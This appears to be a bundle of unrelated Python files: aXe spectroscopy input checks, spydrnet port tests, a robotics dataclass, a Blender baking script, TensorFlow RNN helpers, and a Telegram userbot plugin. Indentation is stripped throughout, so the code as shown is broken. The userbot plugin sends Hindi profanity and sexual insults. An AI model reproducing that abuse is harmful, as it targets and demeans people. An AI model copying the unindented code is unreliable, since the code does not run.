from . import axeinputs
# store the parameters
self.taskname = taskname
# check whether an IIL exists
if inlist != None:
# make sure the Input Image List does exist
if not os.path.isfile(inlist):
err_msg = '%s: The Input Image List "%s" does not exist!' % (self.taskname, inlist)
raise aXeError(err_msg)
# create a list with the basic aXe inputs
self.axe_inputs = axeinputs.aXeInputList(inlist, configs, backims)
else:
# set the parameter to None
self.axe_inputs = None
def _is_prism_data(self):
"""
"""
from astropy.io import fits as pyfits
# define the default
is_prism = 0
# make sure there are grism images
if len(self.axe_inputs) > 0:
# pick out one grism image
one_grisim = self.axe_inputs[0]['GRISIM']
# open the fits
one_fits = pyfits.open(axeutils.getIMAGE(one_grisim), 'readonly')
# read the keyword 'FILTER1'
if 'FILTER1' in one_fits[0].header:
filter1 = one_fits[0].header['FILTER1']
else:
filter1 = None
# read the keyword 'FILTER2'
if 'FILTER2' in one_fits[0].header:
filter2 = one_fits[0].header['FILTER2']
else:
filter2 = None
# check whether it is prism data
if (filter1 and filter1.find('PR') > -1) or (filter2 and filter2.find('PR') > -1):
# switch to IS_PRISM
is_prism = 1
# close the fits
one_fits.close()
# return the index
return is_prism
def _check_grism(self):
"""
Check the presence of all grism images
"""
# go over all inputs
for one_input in self.axe_inputs:
# check the prism image
if not os.path.isfile(axeutils.getIMAGE(one_input['GRISIM'])):
# error and out
err_msg = '%s: The grism image: "%s" does not exist!' % (self.taskname, axeutils.getIMAGE(one_input['GRISIM']))
raise aXeError(err_msg)
def _check_direct(self):
"""
Check the presence of all grism images
"""
# make an empty list
direct_list = []
# go over all inputs
for one_input in self.axe_inputs:
# go on if there is nor direct image
if not one_input['DIRIM']:
continue
# go on if the direct image has already been checked
if one_input['DIRIM'] in direct_list:
continue
# check the prism image
if not os.path.isfile(axeutils.getIMAGE(one_input['DIRIM'])):
# error and out
err_msg = '%s: The direct image: "%s" does not exist!' % (self.taskname, axeutils.getIMAGE(one_input['DIRIM']))
raise aXeError(err_msg)
# put the direct image to the list
direct_list.append(one_input['DIRIM'])
def _check_IOL(self):
"""
Check the presence of all grism images
"""
from . import axeiol
# make an empty list
IOL_list = []
# go over all inputs
for one_input in self.axe_inputs:
# go on if the list has been checked
if one_input['OBJCAT'] in IOL_list:
continue
# check the prism image
if not os.path.isfile(axeutils.getIMAGE(one_input['OBJCAT'])):
# error and out
err_msg = '%s: The direct image: "%s" does not exist!' % (self.taskname, axeutils.getIMAGE(one_input['OBJCAT']))
raise aXeError(err_msg)
# load the IOL to check its format
iol = axeiol.InputObjectList(axeutils.getIMAGE(one_input['OBJCAT']))
# put the IOL to the list
IOL_list.append(one_input['OBJCAT'])
def _check_config(self):
"""
Check the presence of all grism images
"""
from . import configfile
# make an empty list
conf_list = []
# go over all inputs
for one_input in self.axe_inputs:
# check whether the config was already tested
if one_input['CONFIG'] in conf_list:
continue
# check the prism image
if not os.path.isfile(axeutils.getCONF(one_input['CONFIG'])):
# error and out
err_msg = '%s: The configuration file: "%s" does not exist!' % (self.taskname, axeutils.getCONF(one_input['CONFIG']))
raise aXeError(err_msg)
# load the configuration file;
# make sure all files mentioned therein do exist
conf = configfile.ConfigFile(axeutils.getCONF(one_input['CONFIG']))
conf.check_files()
# put the config to the list
conf_list.append(one_input['CONFIG'])
def _force_dirim(self):
# go over all inputs
for one_input in self.axe_inputs:
# check whether there is a direct image
if one_input['DIRIM'] == None:
# error and out
err_msg = '%s: The grism image: "%s" does NOT have an associated direct image!' % (self.taskname, axeutils.getIMAGE(one_input['GRISIM']))
raise aXeError(err_msg)
def _check_masterbck(self):
"""
Check the presence of all grism images
"""
# make an empty list
bck_list = []
# go over all inputs
for one_input in self.axe_inputs:
# check whether the config was already tested
if one_input['FRINGE'] in bck_list:
continue
# check the prism image
if not os.path.isfile(axeutils.getCONF(one_input['FRINGE'])):
# error and out
err_msg = '%s: The master background file: "%s" does not exist!' % (self.taskname, axeutils.getCONF(one_input['FRINGE']))
raise aXeError(err_msg)
# put the config to the list
bck_list.append(one_input['FRINGE'])
def _check_fluxcubes(self):
from . import configfile
# go over all inputs
for one_input in self.axe_inputs:
# load the config file and get the extension information
conf = configfile.ConfigFile(axeutils.getCONF(one_input['CONFIG']))
ext_info = axeutils.get_ext_info(axeutils.getIMAGE(one_input['GRISIM']), conf)
# derive the aXe names
axe_names = axeutils.get_axe_names(one_input['GRISIM'], ext_info)
# check the fluxcube
if not os.path.isfile(axeutils.getIMAGE(axe_names['FLX'])):
# error and out
err_msg = '%s: The fluxcube file: "%s" does not exist!' % (self.taskname, axeutils.getIMAGE(axe_names['FLX']))
raise aXeError(err_msg)
def _check_global_backsub(self):
"""
Check for global background subtraction
"""
from astropy.io import fits as pyfits
from . import configfile
# go over all inputs
for one_input in self.axe_inputs:
# load the config file and get the extension information
conf = configfile.ConfigFile(axeutils.getCONF(one_input['CONFIG']))
ext_info = axeutils.get_ext_info(axeutils.getIMAGE(one_input['GRISIM']), conf)
# open the fits image
gri_fits = pyfits.open(axeutils.getIMAGE(one_input['GRISIM']), 'readonly')
# go to the correct header
act_header = gri_fits[ext_info['fits_ext']].header
# make sure a sky background value is set
if 'SKY_CPS' in act_header and act_header['SKY_CPS'] >= 0.0:
# close the fits
gri_fits.close()
else:
# close fits, complain and out
gri_fits.close()
err_msg = '%s: The grism image: \n%s\nhas no keyword "SKY_CPS>=0.0" in the extension %i. This means it had NO global\nsky subtraction, which is required for the CRR version of aXedrizzle!' % (self.taskname, axeutils.getIMAGE(one_input['GRISIM']), ext_info['fits_ext'])
raise aXeError(err_msg)
def _check_dpps(self, back=False):
from . import configfile
# go over all inputs
for one_input in self.axe_inputs:
# load the config file and get the extension information
conf = configfile.ConfigFile(axeutils.getCONF(one_input['CONFIG']))
ext_info = axeutils.get_ext_info(axeutils.getIMAGE(one_input['GRISIM']), conf)
# derive the aXe names
axe_names = axeutils.get_axe_names(one_input['GRISIM'], ext_info)
# check the DPP file
if not os.path.isfile(axeutils.getOUTPUT(axe_names['DPP'])):
# error and out
err_msg = '%s: The DPP file: "%s" does not exist!' % (self.taskname, axeutils.getOUTPUT(axe_names['DPP']))
raise aXeError(err_msg)
# check for the background DPP file
if back and not os.path.isfile(axeutils.getOUTPUT(axe_names['BCK_DPP'])):
# error and out
err_msg = '%s: The background DPP file: "%s" does not exist!' % (self.taskname, axeutils.getOUTPUT(axe_names['BCK_DPP']))
raise aXeError(err_msg)
def check_axeprep(self, backgr, backims):
"""
Comprises all file and file format checks for AXEPREP
"""
# check the grism images
self._check_grism()
# check the configuration files
self._check_config()
# check the direct images
self._check_direct()
# check the IOL's
self._check_IOL()
# scheck for background subtraction
if backgr:
# make sure that a background
# subtraction is possible
if len(backims) < 1:
err_msg = '%s: A background image must be given for the background subtraction!' % self.taskname
raise aXeError(err_msg)
# check the existence of background images
self._check_masterbck()
def check_axecore(self, back, extrfwhm, drzfwhm, backfwhm, orient, slitless_geom, np, interp,
cont_model, weights, sampling):
"""
Comprises all file and file format checks for AXECORE
"""
import math
# check the grism images
self._check_grism()
# check the configuration files
self._check_config()
# check the direct images
self._check_direct()
# check the IOL's
self._check_IOL()
# check the fluxcubes, if necessary
if cont_model.lower() == 'fluxcube':
self._check_fluxcubes()
# check whether it is prism data
if self._is_prism_data():
#
# NOTE: these checks are not exactly
# related to files.....
#
# make sure that there are
# direct images
self._force_dirim()
# the fluxcube contamination does not work for prism data
if cont_model.lower() == "fluxcube":
err_msg = '%s: Fluxcube contamination is not possible for prism data!' % self.taskname
raise aXeError(err_msg)
# drizzled stamp images are not supported for prism data
if sampling.lower() == "drizzle":
err_msg = '%s: Drizzle sampling for the stamp images is not possible for prism data!' % self.taskname
raise aXeError(err_msg)
# the extraction width must be set!
if not extrfwhm:
err_msg = '%s: "extrfwhm" must be > 0.0 to create PETs, but "extrfwhm=%.1f"!' % (self.taskname, extrfwhm)
raise aXeError(err_msg)
# negative extraction width is significant ONLY
# if orient="NO"
if orient and extrfwhm < 0.0:
err_msg = '%s: Negative width "extrfwhm=%.1f" together with extraction "orient=yes" does NOT make sense!' % (self.taskname, extrfwhm)
raise aXeError(err_msg)
# for background extraction the width must be set!
if back and not backfwhm:
err_msg = '%s: With "back=yes" the parameter "backfwhm" must be set to create background PETs!' % self.taskname
raise aXeError(err_msg)
# extraction width and drizzle extraction width
# must have the same sign
if extrfwhm*drzfwhm < 0.0:
err_msg = '%s: "extrfwhm=%.1f" and "drzfwhm=%.1f" must BOTH be either positive or negative!' % (self.taskname, extrfwhm, drzfwhm)
raise aXeError(err_msg)
else:
# the extractionwidth must be larger than the
# drizzle extraction width
if not math.fabs(extrfwhm) > math.fabs(drzfwhm):
err_msg = '%s: fabs(extrfwhm) MUST be larger than fabs(drzfwhm), but "extrfwhm=%.1f" and "drzfwhm=%.1f"!' % (self.taskname, extrfwhm, drzfwhm)
raise aXeError(err_msg)
# extraction width and background extraction width
# must have the same sign
if back and extrfwhm*backfwhm < 0.0:
err_msg = '%s: "extrfwhm=%.1f" and "backfwhm=%.1f" must BOTH be either positive or negative!' % (self.taskname, extrfwhm, backfwhm)
raise aXeError(err_msg)
# the background extraction width must be larger than the
# object extraction width
elif back and math.fabs(extrfwhm) > math.fabs(backfwhm):
err_msg = '%s: fabs(backfwhm) MUST be larger than fabs(extrfwhm), but "backfwhm=%.1f" and "extrfwhm=%.1f"!' % (self.taskname, backfwhm, extrfwhm)
raise aXeError(err_msg)
# for background extraction the number of background
# pixels must be set
if back and not np:
err_msg = '%s: The parameter "np" must be set for the background PETs!' % self.taskname
raise aXeError(err_msg)
# for background extraction the interpolation
# type must be set
if back and not interp:
err_msg = '%s: The parameter "interp" must be set for the background PETs!' % self.taskname
raise aXeError(err_msg)
# check for proper contamination
# to allow optimal extraction
if cont_model == "geometric" and weights:
err_msg = """%s: Optimal weigthing needs quantitative contamination!
Please change to either the "gauss" or "fluxcube" contamination
model or drop optimal weighting!""" % self.taskname
raise aXeError(err_msg)
def check_axedrizzle(self, infwhm, outfwhm, back=False):
"""
Comprises all file and file format checks for AXEDRIZZLE
"""
import math
# check the grism images
self._check_grism()
# check the configuration files
self._check_config()
# check the DPP files
self._check_dpps(back)
# make sure that fabs(infwhm) and fabs(outfwhm) > 0.0
if math.fabs(infwhm) == 0.0 or math.fabs(outfwhm) == 0.0:
err_msg = '%s: fabs(infwhm) AND fabs(outfwhm) must be larger than 0.0, but "infwhm=%.1f" and "outfwhm=%.1f"!' % (self.taskname, infwhm, outfwhm)
raise aXeError(err_msg)
# make sure that fabs(infwhm) > fabs(outfwhm)
if math.fabs(infwhm) < math.fabs(outfwhm):
err_msg = '%s: fabs(infwhm) MUST be larger than fabs(outfwhm), but "infwhm=%.1f" and "outfwhm=%.1f"!' % (self.taskname, infwhm, outfwhm)
raise aXeError(err_msg)
# make sure that infwhm and outfwhm
# have consistent sign
if infwhm * outfwhm < 0.0:
err_msg = '%s: "infwhm=%.1f" and "outfwhm=%.1f" must BOTH be either positive or negative!' % (self.taskname, infwhm, outfwhm)
raise aXeError(err_msg)
def check_axecrr(self, back):
"""
Comprises all checks for the CRR version of AXEDRIZZLE
"""
# make sure that background drizzling is off
if back:
err_msg = '%s: Background drizzling is NOT possible in the CRR version of aXedrizzle!' % (self.taskname)
raise aXeError(err_msg)
# check for global background subtraction
self._check_global_backsub()
def check_simdispim_input(self, incat, config, lambda_psf,
model_spectra, model_images,
nx, ny, exptime, bck_flux, extraction,
extrfwhm, orient, slitless_geom, adj_sens):
"""
Does basic checks on the parameters
The method checks whether all input values are reasonable, e.g.
the exposure time and background flux >= 0.0 and similar.
Input files are checked for existence. Also the input type is
checked for the numbers.
@param incat: name of model object table
@type incat: string
@param config: aXe configuration file name
@type config: string
@param lambda_psf: wavelength the object shapes were determined at
@type lambda_psf: float
@param model_spectra: name of model spectra
@type model_spectra: string
@param model_images: name of model images
@type model_image: string
@param nx: number of pixels in x
@type nx: int
@param ny: number of pixels in y
@type ny: int
@param exptime: exposure time
@type exptime: dloat
@param bck_flux: flux in background
@type bck_flux: float
@param extraction: flag for default extraction
@type extraction: boolean
@param extrfwhm: multiplier for extraction width
@type extrfwhm: float
@param orient: flag for tilted extraction
@type orient: boolean
@param slitless_geom: flag for slitless optimized extraction
@type slitless_geom: boolean
@param adj_sens: flag for adjusted flux conversion
@type adj_sens: boolean
"""
from . import configfile
# do the setup
axeutils.axe_setup(axesim=True)
# check the existence of the
# model object table
if not os.path.isfile(axeutils.getIMAGE(incat)):
error_message = 'The Model Object Table does not exist: ' + axeutils.getIMAGE(incat)
raise aXeSIMError(error_message)
# check the existence of the
# axe configuration file
if not os.path.isfile(axeutils.getCONF(config)):
error_message = 'The aXe configuration file does not exist: ' + axeutils.getCONF(config)
raise aXeSIMError(error_message)
else:
# load the aXe configuration file
conf = configfile.ConfigFile(axeutils.getCONF(config))
# make the internal checks
n_sens = conf.check_files(check_glob=False)
# make sure there is
# at least one sens. file
if n_sens < 1:
error_message = 'There must be at least one sensitivity file in: ' + axeutils.getCONF(config)
raise aXeSIMError(error_message)
# check whether the configuration files
# allows the requested extraction
if extraction and (slitless_geom or adj_sens):
extr_ready = conf.confirm_extrkeys()
# error and out
if not extr_ready:
error_message = """
It is not possible to perform the requested extraction.
The likely cause is that the configuration file does NOT contain
the keywords 'POBJSIZE' or 'SMFACTOR' or their values are NOT
reasonable (e.g. <0.0)!
"""
raise aXeSIMError(error_message)
# check the lambda_psf-value
if lambda_psf != None and lambda_psf <= 0.0:
error_message = 'Value for "lambda_psf" most be positive: ' + str(lambda_psf)
raise aXeSIMError(error_message)
if model_spectra != None:
# check the existence of the
# model spectra file
if not os.path.isfile(axeutils.getIMAGE(model_spectra)):
error_message = 'The model spectra file does not exist: ' + axeutils.getIMAGE(model_spectra)
raise aXeSIMError(error_message)
if model_images != None:
# check the existence of the
# model images file
if not os.path.isfile(axeutils.getIMAGE(model_images)):
error_message = 'The model images file does not exist: ' + axeutils.getIMAGE(model_images)
raise aXeSIMError(error_message)
# check the nx-value
if nx != None and nx <= 0.0:
error_message = 'Value for "nx" or "nx_disp" most be positive: ' + str(nx)
raise aXeSIMError(error_message)
# check the ny-value
if ny != None and ny <= 0:
error_message = 'Value for "ny" or "ny_disp" most be positive: ' + str(ny)
raise aXeSIMError(error_message)
# check the exptime-value
if exptime != None and exptime < 0:
error_message = 'Value for "exptime" or "exptime_disp" most be positive: ' + str(exptime)
raise aXeSIMError(error_message)
# the extraction width must be set!
if not extrfwhm:
error_message = 'Value for "extrfwhm" must not be 0.0 to create PETs, but "extrfwhm=%.1f"!' % extrfwhm
raise aXeSIMError(error_message)
# negative extraction width is significant ONLY
# if orient="NO"
if orient and extrfwhm < 0.0:
error_message = 'Negative width "extrfwhm=%.1f" together with extraction "orient=yes" does NOT make sense!' % extrfwhm
raise aXeSIMError(error_message)
try:
# convert to float
bck = float(bck_flux)
# check for positive value
if bck < 0:
error_message = 'Value for "bck_flux" or "bck_flux_disp" most be positive: ' + str(bck_flux)
raise aXeSIMError(error_message)
# catch a string
except ValueError:
# check for existence of file
if not os.path.isfile(axeutils.getCONF(bck_flux)):
error_message = 'The background file does not exist: ' + axeutils.getCONF(bck_flux)
raise aXeSIMError(error_message)
def check_simdirim_input(self, incat, config, tpass_direct,
model_spectra, model_images,
nx, ny, exptime, bck_flux):
"""
Does basic checks on the parameters
The method checks whether all input values are reasonable, e.g.
the exposure time and background flux >= 0.0 and similar.
Input files are checked for existence. Also the input type is
checked for the numbers.
@param incat: name of model object table
@type incat: string
@param config: aXe configuration file name
@type config: string
@param tpass_direct: total passband file
@type tpass_direct: string
@param model_spectra: name of model spectra
@type model_spectra: string
@param model_images: name of model images
@type model_image: string
@param nx: number of pixels in x
@type nx: int
@param ny: number of pixels in y
@type ny: int
@param exptime: exposure time
@type exptime: dloat
@param bck_flux: flux in background
@type bck_flux: dloat
"""
from . import configfile
# do the setup
axeutils.axe_setup(axesim=True)
# check the existence of the
# model object table
if not os.path.isfile(axeutils.getIMAGE(incat)):
error_message = 'The Model Object Table does not exist: ' + axeutils.getIMAGE(incat)
raise aXeSIMError(error_message)
# check the existence of the
# axe configuration file
if not os.path.isfile(axeutils.getCONF(config)):
error_message = 'The aXe configuration file does not exist: ' + axeutils.getCONF(config)
raise aXeSIMError(error_message)
else:
# load the aXe configuration file
conf = configfile.ConfigFile(axeutils.getCONF(config))
# make the internal checks
n_sens = conf.check_files(check_glob=False)
# make sure there is
# at least one sens. file
if n_sens < 1:
error_message = 'There must be at least one sensitivity file in: ' + axeutils.getCONF(config)
raise aXeSIMError(error_message)
# check the existence of the
# total passband file
if not os.path.isfile(axeutils.getSIMDATA(tpass_direct)):
error_message = 'The total passband file does not exist: ' + axeutils.getSIMDATA(tpass_direct)
raise aXeSIMError(error_message)
if model_spectra != None:
# check the existence of the
# model spectra file
if not os.path.isfile(axeutils.getIMAGE(model_spectra)):
error_message = 'The model spectra file does not exist: ' + axeutils.getIMAGE(config)
raise aXeSIMError(error_message)
if model_images != None:
# check the existence of the
# model images file
if not os.path.isfile(axeutils.getIMAGE(model_images)):
error_message = 'The model images file does not exist: ' + axeutils.getIMAGE(config)
raise aXeSIMError(error_message)
# check the nx-value
if nx != None and nx <= 0.0:
error_message = 'Value for "nx" or "nx_dir" most be positive: ' + str(nx)
raise aXeSIMError(error_message)
# check the ny-value
if ny != None and ny <= 0:
error_message = 'Value for "ny" or "ny_dir" most be positive: ' + str(ny)
raise aXeSIMError(error_message)
# check the exptime-value
if exptime != None and exptime < 0:
error_message = 'Value for "exptime" or "exptime_dir" most be positive: ' + str(exptime)
raise aXeSIMError(error_message)
if bck_flux != None:
# check the bck_flux-value
try:
# convert to float
bck = float(bck_flux)
# check for positive value
if bck < 0:
error_message = 'Value for "bck_flux" or "bck_flux_dir" most be positive: ' + str(bck_flux)
raise aXeSIMError(error_message)
# catch a string
except ValueError:
# check for existence of file
if not os.path.isfile(axeutils.getCONF(bck_flux)):
error_message = 'The background file does not exist: ' + axeutils.getCONF(bck_flux)
raise aXeSIMError(error_message)
|
import unittest
import spydrnet as sdn
class TestGetPorts(unittest.TestCase):
def test_parameter_checking(self):
definition = sdn.Definition()
port = definition.create_port()
port.name = "MY_PORT"
self.assertRaises(TypeError, sdn.get_ports, definition, "MY_PORT", patterns="MY_PORT")
self.assertRaises(TypeError, sdn.get_ports, definition, "MY_PORT", unsupported_keyword=None)
self.assertRaises(TypeError, sdn.get_ports, None, "MY_PORT")
self.assertRaises(TypeError, sdn.get_ports, [None, definition], "MY_PORT")
def test_collection(self):
definition = sdn.Definition()
port = definition.create_port()
port.name = "MY_PORT"
instance = sdn.Instance()
instance.name = "MY_INST"
ports = list(sdn.get_ports([definition, instance]))
self.assertEqual(len(ports), 1)
def test_get_ports_on_instance(self):
definition = sdn.Definition()
port = definition.create_port()
port.name = "MY_PORT"
instance = sdn.Instance()
instance.reference = definition
port1 = next(instance.get_ports("MY_PORT"))
self.assertEqual(port, port1)
def test_get_ports_in_library(self):
library = sdn.Library()
definition = library.create_definition()
port = definition.create_port()
port.name = "MY_PORT"
instance = sdn.Instance()
instance.reference = definition
port1 = next(library.get_ports("MY_PORT"))
self.assertEqual(port, port1)
def test_get_ports_in_netlist(self):
netlist = sdn.Netlist()
library = netlist.create_library()
definition = library.create_definition()
port = definition.create_port()
port.name = "MY_PORT"
instance = sdn.Instance()
instance.reference = definition
port1 = next(netlist.get_ports("MY_PORT"))
self.assertEqual(port, port1)
def test_get_port_reflection(self):
port = sdn.Port()
port.name = "MY_PORT"
search = next(sdn.get_ports(port, "MY_PORT"))
self.assertEqual(port, search)
def test_get_port_inner_pin(self):
port = sdn.Port()
pin = port.create_pin()
search = next(sdn.get_ports(pin))
self.assertEqual(port, search)
port.remove_pin(pin)
search = next(sdn.get_ports(pin), None)
self.assertIsNone(search)
def test_get_port_instance_and_outer_pin(self):
definition = sdn.Definition()
port = definition.create_port()
pin = port.create_pin()
instance = sdn.Instance()
instance.reference = definition
search = next(sdn.get_ports(instance))
self.assertIs(port, search)
outer_pin = instance.pins[pin]
search = next(sdn.get_ports(outer_pin))
self.assertIs(port, search)
def test_get_ports_href_cable(self):
netlist = sdn.Netlist()
library = netlist.create_library()
definition = library.create_definition()
port = definition.create_port()
pin = port.create_pin()
cable = definition.create_cable()
wire = cable.create_wire()
wire.connect_pin(pin)
instance = sdn.Instance()
instance.reference = definition
netlist.top_instance = instance
href = next(sdn.get_hcables(cable))
search = next(sdn.get_ports(href))
self.assertIs(port, search)
def test_unique(self):
netlist = sdn.Netlist()
library = netlist.create_library()
definition = library.create_definition()
port = definition.create_port()
pin = port.create_pin()
cable = definition.create_cable()
wire = cable.create_wire()
wire.connect_pin(pin)
instance = sdn.Instance()
instance.reference = definition
search = list(sdn.get_ports([netlist, cable]))
self.assertIs(port, search[0])
search = list(sdn.get_ports(cable))
self.assertIs(port, search[0])
|
# coding=utf-8
# Copyright 2022 The Reach ML Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dataclass holding info needed for pushing oracles."""
import dataclasses
from typing import Any
@dataclasses.dataclass
class PushingInfo:
"""Holds onto info necessary for pushing state machine."""
xy_block: Any = None
xy_ee: Any = None
xy_pre_block: Any = None
xy_delta_to_nexttoblock: Any = None
xy_delta_to_touchingblock: Any = None
xy_dir_block_to_ee: Any = None
theta_threshold_to_orient: Any = None
theta_threshold_flat_enough: Any = None
theta_error: Any = None
obstacle_poses: Any = None
distance_to_target: Any = None
|
import asyncio
from telethon import events
from uniborg.util import admin_cmd
@borg.on(admin_cmd(pattern="moj?(.*)"))
async def _(event):
if not event.text[0].isalpha() and event.text[0] not in ("/", "#", "@", "!"):
await event.edit("RE")
await asyncio.sleep(0.7)
await event.edit("BHSDK")
await asyncio.sleep(1)
await event.edit("BETE")
await asyncio.sleep(0.8)
await event.edit("MOJ ")
await asyncio.sleep(0.9)
await event.edit("KRDI")
await asyncio.sleep(1)
await event.edit("TUM TO")
await asyncio.sleep(0.8)
await event.edit("😈")
await asyncio.sleep(0.7)
await event.edit("BADE HEAVY DRIVER HO BETE")
await asyncio.sleep(1)
await event.edit("😂RE BHSDK BETE MOJ KRDI TUM TO BADE HEAVY DRIVER HO🤣 ")
@borg.on(events.NewMessage(pattern=r"\.nonehi", outgoing=True))
async def _(event):
if event.fwd_from:
return
await event.edit("bhsdk beteeeeeeesssesseeeee ma chuda")
await asyncio.sleep(999)
from userbot.cmdhelp import CmdHelp
CmdHelp("lmoj").add_command("moj", None, "Its like abuse").add_command(
"nonehi", None, "Try It"
).add()
|
import argparse
import os
import sys
import bpy
"""
blender test.blend -b -P rendering.py -- --r 512 --m normalmap --o ./normalmap.png
blender test.blend -b -P rendering.py -- --r 512 --m heightmap --o ./heightmap.png
"""
dirpath = os.path.dirname(os.path.abspath(__file__))
def render_heightmap(img_resolution: int, out_path: str) -> str:
bpy.context.window.scene = bpy.data.scenes["Scene"]
bpy.ops.object.select_all(action='DESELECT')
# Объекты, объём которых запекаем
objs_collection = bpy.data.collections["objects_for_baking"].all_objects
# Активируем во всех объектах нужный нод Material Output
for obj in objs_collection:
for mat_slot in obj.material_slots:
mat = mat_slot.material
# Активируем Material Output для карты нормалей
mat.node_tree.nodes.active = mat.node_tree.nodes["heightmap_out"]
bpy.context.scene.render.filepath = out_path
bpy.context.scene.render.engine = 'BLENDER_EEVEE'
bpy.context.scene.view_settings.view_transform = 'Standard'
bpy.context.scene.render.image_settings.color_mode = 'BW'
bpy.context.scene.render.resolution_y = img_resolution
bpy.context.scene.render.resolution_x = img_resolution
bpy.data.objects["bakescreen"].hide_render = True
bpy.ops.render.render('INVOKE_DEFAULT', write_still=True)
return out_path
def bake_normalmap(img_resolution: int, out_path: str) -> str:
""" Запекает карту нормалей в режиме selected to active.
Предпологается, что существует объект с названием `bakescreen`
и с одноимённым материалом. На этот объект запекаются нормали
с объекта `object_name`. """
bpy.context.window.scene = bpy.data.scenes["Scene"]
bpy.ops.object.select_all(action='DESELECT')
bpy.context.scene.render.engine = 'CYCLES'
# Объект, на который запекаем
bakescreen_obj = bpy.data.objects["bakescreen"]
# Объекты, объём которых запекаем
objs_collection = bpy.data.collections["objects_for_baking"].all_objects
# Выделяем объекты и делаем активными Material Output'ы
for obj in objs_collection:
obj.select_set(True)
for mat_slot in obj.material_slots:
mat = mat_slot.material
# Активируем Material Output для карты нормалей
mat.node_tree.nodes.active = mat.node_tree.nodes["normalmap_out"]
# Объекты выделены (выше), а bakescreen делаем активным
bakescreen_obj.select_set(True)
bpy.context.view_layer.objects.active = bakescreen_obj
# Создаём картинку для запекания
bake_img = bpy.data.images.new('bake', img_resolution, img_resolution)
# Создаём нод с картинкой, активируем
nodes = bakescreen_obj.material_slots[0].material.node_tree.nodes
texture_node = nodes.new('ShaderNodeTexImage')
texture_node.select = True
nodes.active = texture_node
texture_node.image = bake_img
bpy.context.scene.render.image_settings.color_mode = 'RGB'
bpy.context.scene.render.bake.use_selected_to_active = True
bpy.ops.object.bake(type='NORMAL', save_mode='EXTERNAL')
bake_img.save_render(filepath=out_path)
return out_path
parser = argparse.ArgumentParser()
parser.add_argument("--resolution", "--r", help="output image side in pixels")
parser.add_argument("--out", "--o", help="Output file path")
parser.add_argument("--map", "--m", help="heightmap or normalmap")
args = parser.parse_args(sys.argv[sys.argv.index("--")+1:])
if args.map == "heightmap":
render_heightmap(int(args.resolution), os.path.abspath(args.out))
else:
bake_normalmap(int(args.resolution), os.path.abspath(args.out))
|
import tensorflow as tf
import tensorflow.contrib as tc
from tensorflow.contrib import cudnn_rnn
def nor_rnn(rnn_type, inputs, length, hidden_size, layer_num=1, dropout_keep_prob=None, concat=True):
if not rnn_type.startswith('bi'):
cells = tc.rnn.MultiRNNCell([get_nor_cell(rnn_type, hidden_size, dropout_keep_prob) for _ in range(layer_num)],
state_is_tuple=True)
outputs, state = tf.nn.dynamic_rnn(cells, inputs, sequence_length=length, dtype=tf.float32)
if rnn_type.endswith('lstm'):
c, h = state
state = h
else:
if layer_num > 1:
cell_fw = [get_nor_cell(rnn_type, hidden_size, dropout_keep_prob) for _ in range(layer_num)]
cell_bw = [get_nor_cell(rnn_type, hidden_size, dropout_keep_prob) for _ in range(layer_num)]
outputs, state_fw, state_bw = tc.rnn.stack_bidirectional_dynamic_rnn(
cell_fw, cell_bw, inputs, sequence_length=length, dtype=tf.float32
)
else:
cell_fw = get_nor_cell(rnn_type, hidden_size, dropout_keep_prob)
cell_bw = get_nor_cell(rnn_type, hidden_size, dropout_keep_prob)
outputs, state = tf.nn.bidirectional_dynamic_rnn(
cell_fw, cell_bw, inputs, sequence_length=length, dtype=tf.float32
)
return outputs
def get_nor_cell(rnn_type, hidden_size, dropout_keep_prob=None):
if rnn_type.endswith('lstm'):
cell = tc.rnn.LSTMCell(num_units=hidden_size, state_is_tuple=True)
elif rnn_type.endswith('gru'):
cell = tc.rnn.GRUCell(num_units=hidden_size)
elif rnn_type.endswith('rnn'):
cell = tc.rnn.BasicRNNCell(num_units=hidden_size)
elif rnn_type.endswith('sru'):
cell = tc.rnn.SRUCell(num_units=hidden_size)
elif rnn_type.endswith('indy'):
cell = tc.rnn.IndyGRUCell(num_units=hidden_size)
else:
raise NotImplementedError('Unsuported rnn type: {}'.format(rnn_type))
if dropout_keep_prob is not None:
cell = tc.rnn.DropoutWrapper(cell,
input_keep_prob=dropout_keep_prob,
output_keep_prob=dropout_keep_prob)
return cell
def cu_rnn(rnn_type, inputs, hidden_size, batch_size, layer_num=1):
if not rnn_type.startswith('bi'):
cell = get_cu_cell(rnn_type, hidden_size, layer_num, 'unidirectional')
inputs = tf.transpose(inputs, [1, 0, 2])
c = tf.zeros([layer_num, batch_size, hidden_size], tf.float32)
h = tf.zeros([layer_num, batch_size, hidden_size], tf.float32)
outputs, state = cell(inputs)
if rnn_type.endswith('lstm'):
c, h = state
state = h
else:
cell = get_cu_cell(rnn_type, hidden_size, layer_num, 'bidirectional')
inputs = tf.transpose(inputs, [1, 0, 2])
outputs, state = cell(inputs)
# if concat:
# state = tf.concat([state_fw, state_bw], 1)
# else:
# state = state_fw + state_bw
outputs = tf.transpose(outputs, [1, 0, 2])
return outputs, state
def get_cu_cell(rnn_type, hidden_size, layer_num=1, direction='undirectional'):
if rnn_type.endswith('lstm'):
cudnn_cell = cudnn_rnn.CudnnLSTM(num_layers=layer_num, num_units=hidden_size, direction=direction,
dropout=0)
elif rnn_type.endswith('gru'):
cudnn_cell = cudnn_rnn.CudnnGRU(num_layers=layer_num, num_units=hidden_size, direction=direction,
dropout=0)
elif rnn_type.endswith('rnn'):
cudnn_cell = cudnn_rnn.CudnnRNNTanh(num_layers=layer_num, num_units=hidden_size, direction=direction,
dropout=0)
else:
raise NotImplementedError('Unsuported rnn type: {}'.format(rnn_type))
return cudnn_cell
def dense(inputs, hidden, use_bias=True, scope='dense', initializer=None):
with tf.variable_scope(scope):
shape = tf.shape(inputs)
dim = inputs.get_shape().as_list()[-1]
# 前两个维度与输入相同,最后加上输出维度
out_shape = [shape[idx] for idx in range(len(inputs.get_shape().as_list()) - 1)] + [hidden]
flat_inputs = tf.reshape(inputs, [-1, dim])
W = tf.get_variable('W', [dim, hidden], initializer=initializer)
res = tf.matmul(flat_inputs, W)
if use_bias:
b = tf.get_variable('b', [hidden], initializer=tf.constant_initializer(0.))
res = tf.nn.bias_add(res, b)
res = tf.reshape(res, out_shape)
return res
|
# AUTO GENERATED FILE - DO NOT EDIT
